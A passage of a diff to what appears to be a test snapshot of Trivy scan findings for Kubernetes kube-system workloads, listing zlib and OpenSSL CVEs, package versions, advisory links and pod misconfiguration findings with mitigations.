"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://ubuntu.com/security/notices/USN-5051-2", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://ubuntu.com/security/notices/USN-5051-3", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1:1.2.11.dfsg-2+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-25032", - "installedVersion": "1:1.2.11.dfsg-2", - "packageName": "zlib1g", + "fixedVersion": "1.1.1d-0+deb10u8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0778", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ + "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", "http://seclists.org/fulldisclosure/2022/May/33", "http://seclists.org/fulldisclosure/2022/May/35", "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://access.redhat.com/errata/RHSA-2022:5326", + "https://access.redhat.com/security/cve/CVE-2022-0778", + "https://bugzilla.redhat.com/2062202", + "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "https://errata.rockylinux.org/RLSA-2022:4899", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "https://linux.oracle.com/cve/CVE-2022-0778.html", + "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220321-0002/", + "https://security.netapp.com/advisory/ntap-20220429-0005/", "https://support.apple.com/kb/HT213255", "https://support.apple.com/kb/HT213256", "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://ubuntu.com/security/notices/USN-5328-1", + "https://ubuntu.com/security/notices/USN-5328-2", + "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220315.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.tenable.com/security/tns-2022-06", + "https://www.tenable.com/security/tns-2022-07", + "https://www.tenable.com/security/tns-2022-08", + "https://www.tenable.com/security/tns-2022-09", ], }, "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", + "value": "https://avd.aquasec.com/nvd/cve-2022-0778", + }, + { + "type": "URL", + "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", }, { "type": "URL", @@ -86302,4543 +87391,4233 @@ commonly used by applications.", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "value": "https://access.redhat.com/errata/RHSA-2022:5326", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://access.redhat.com/security/cve/CVE-2022-0778", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://bugzilla.redhat.com/2062202", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://errata.rockylinux.org/RLSA-2022:4899", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", }, { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", }, { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://ubuntu.com/security/notices/USN-5328-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://ubuntu.com/security/notices/USN-5328-2", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://www.openssl.org/news/secadv/20220315.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://www.tenable.com/security/tns-2022-06", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://www.tenable.com/security/tns-2022-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "https://www.tenable.com/security/tns-2022-08", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "https://www.tenable.com/security/tns-2022-09", + }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "double free after calling PEM_read_bio_ex", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://bugzilla.redhat.com/2164487", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/2164494", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'kube-proxy' of DaemonSet 'kube-proxy' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(DaemonSet 'kube-proxy' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'kube-proxy' of DaemonSet 'kube-proxy' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": 